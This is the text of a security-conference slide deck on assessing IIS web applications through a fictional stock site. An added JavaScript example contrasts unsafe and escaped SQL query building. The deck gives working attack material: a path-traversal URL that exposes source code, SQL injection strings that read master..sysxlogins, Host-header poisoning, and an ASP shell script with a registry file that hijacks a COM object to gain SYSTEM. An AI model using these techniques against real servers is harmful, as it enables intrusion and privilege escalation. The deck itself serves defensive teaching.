Application Assessments on IIS - PowerPoint PPT Presentation

About This Presentation
Title:

Application Assessments on IIS

Description:

Title: PowerPoint Presentation Author: Nikos Livadas Last modified by: Jeff Moss Created Date: 6/26/2000 7:03:48 PM Document presentation format: On-screen Show – PowerPoint PPT presentation

Slides: 29
Provided by: Nikos150
Transcript and Presenter's Notes

1
Application Assessments on IIS
2
Welcome!
David Litchfield
(d.litchfield@atstake.com)
3
What is an Application Assessment?
Part of a network vulnerability assessment
The application provides the site's functionality
The application is the least tested part, yet often proves to be the greatest risk
4
Vulnerability Scanners
  • Cybercop
  • I. S. S.
  • Cerberus Internet Scanner

5
What scanners do do
They highlight known vulnerabilities in COTS products:
  • Webhits.dll and null.htw
  • MSADC and RDS
  • Ism.dll and the .htr overflow
  • The %C0%AF (Unicode) issue
6
What scanners don't do
They won't assess your application
8
Assessing the Application
What services does the site offer?
What functionality exists to provide these
services?
What drives this functionality?
How does it do this?
9
Stocks-r-us.com
  • Free charting service of current/real-time
    market trends
  • A subscriber service providing detailed market
    analysis
  • An "I've forgot my password" service
  • A contact service
  • Apply for a job with stocks-r-us.com online
    service

10
Free charting service of current/real-time market trends
  • From a web form a user chooses the stock market
  • They also choose a time range
  • On submitting, a page called read_img.asp returns a graph of the ups and downs of the market

http://www.stocks-r-us.com/read_img.asp?IDN=00000008&IFN=AXYZPQ&IFE=png
http://www.stocks-r-us.com/read_img.asp?IDN=&IFN=&IFE=
11
Exception Handling
ASP Error 800814: Create object failed in /includes/olectra.inc
Downloading the .inc file reveals nothing, but there are two issues here: bad exception handling, and .inc has not been mapped to asp.dll
A search on Google reveals Olectra Chart
12
Source code revelation! Olectra creates a virtual directory called /octemp
When a graph or chart is produced, a temp directory is created in the /octemp directory. This directory's name is a number like 00000008
The dynamically produced graph is a random string of letters such as AXYZPQ and has a file extension of .png
/read_img.asp?IDN=../&IFN=read_img&IFE=asp
13
SQL Queries
strSQL = "select price from stocks where name = '" & _
         request.querystring("company") & "'"
This code is insecure!!!
Why?
14
By setting the company parameter to something such as
ISSX' select * from master..sysxlogins
the two queries would execute in batch mode:
select price from stocks where name = 'ISSX' select * from master..sysxlogins
sa login on MS SQL Server
xp_cmdshell extended stored procedure
15
On its own, ASP will not escape a single quote mark (')
.idc files will.
Change all 's provided in a parameter to 0x27, or strip them out
16
Consideration for integer input
strSQL = "Select company from stocks where price > " & _
         request.querystring("price")
Again we can insert an arbitrary SQL query here and have it execute.
17
Verifying numeric input
IsNumeric() for VBScript, isNaN() for JScript
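The string-parameter injection of slides 13 and 14 and the integer-parameter case of slide 16, beside the quote handling of slide 15 and the numeric check of slide 17, as an added example that is not from the slides. It is plain JavaScript so it runs under Node; the function names and sample requests are constructed for the example.

```javascript
// Added example, not from the slides: the vulnerable query construction of
// slides 13 and 16 beside the input handling slides 15 and 17 recommend.
// Plain JavaScript so it runs under Node; in classic ASP the same logic would
// run as JScript with the values read from Request.QueryString.

// Slides 13/16: the parameter is pasted straight into the SQL text.
function buildQueryUnsafe(company, price) {
  return "select price from stocks where name = '" + company +
         "' and price > " + price;
}

// Slide 15: neutralise single quotes in string parameters. Doubling the quote
// is the T-SQL escape; the slide's other option is stripping it out entirely.
function escapeStringParam(value) {
  return String(value).replace(/'/g, "''");
}

// Slide 17: verify numeric input. isNaN() alone is looser than a price needs
// (it accepts "1e3", " 12 ", "0x1F" and "Infinity"), so this requires a plain
// integer or decimal literal before converting. Returns null on rejection.
function parseNumericParam(value) {
  const s = String(value);
  if (!/^-?\d+(\.\d+)?$/.test(s)) return null;
  return Number(s);
}

// Validated variant: returns null when the numeric parameter is rejected, so
// the caller answers with an error instead of sending a query.
function buildQuerySafe(company, price) {
  const p = parseNumericParam(price);
  if (p === null) return null;
  return "select price from stocks where name = '" + escapeStringParam(company) +
         "' and price > " + p;
}

// Constructed sample inputs: one benign request and the two injection strings
// the slides discuss (slide 14 for the string parameter, slide 16 for the integer).
const SAMPLES = [
  { company: "ISSX", price: "10" },
  { company: "ISSX' select * from master..sysxlogins", price: "10" },
  { company: "ISSX", price: "10 select * from master..sysxlogins" },
];

for (const s of SAMPLES) {
  console.log("unsafe:", buildQueryUnsafe(s.company, s.price));
  console.log("safe:  ", buildQuerySafe(s.company, s.price));
}
```

Escaping is what the slide advises; a parameterised ADO command removes the string construction altogether and is the stronger fix where the driver supports it.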
18
r.f.p (Rain Forest Puppy): http://www.wiretrip.net/rfp
19
Contact Service
<% .. Set SMTPObj = GetObject("IIS://" & request.servervariables("SERVER_NAME") & "/SMTPSVC") .. %>
20
HTTP SERVER_NAME Poisoning
Comes from the Host HTTP client header field
  • Learn the password hash for the IWAM account
  • Enumerate SQL servers
  • Proxy attacks
  • Samples on IIS
  • ADSI, Corba and COM

21
On-line job application service
As part of this service stocks-r-us.com allows uploading of Curricula Vitae / Résumés
Client-side checking doesn't work
Scripting is enabled on the /cvtemp virtual directory
22
Gaining SYSTEM Privileges using ASP
  • IIS Security Model
  • IUSR and IWAM accounts

23
Wscript.Shell Object
  • Set WSObj = CreateObject("wscript.shell")
  • Read from the Registry
  • Write to the Registry
  • Execute commands

24
MSI.ASP
<%
Dim WshShell, strCMD, strCMD2, result
strCMD = "cmd.exe /c c:\inetpub\wwwroot\msi.reg"
strCMD2 = "cmd.exe /c c:\inetpub\wwwroot\msi.msi"
Set WshShell = Server.CreateObject("Wscript.Shell")
On Error Resume Next
result = WshShell.Run(strCMD)
result = WshShell.Run(strCMD2)
%>
25
MSI.REG
REGEDIT4
[HKEY_CLASSES_ROOT\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32]
@="c:\\inetpub\\wwwroot\\foo.dll"
"ThreadingModel"="Both"
26
Summary
  • Understand the technology you're dealing with
  • Never trust user input anywhere
  • Ensure permissions are set properly
  • Don't trust third-party software until truly evaluated
  • Don't rely on client-side checking
  • Scanners won't find these problems; you will

27
Questions?
28
Thanks and enjoy the rest of the day!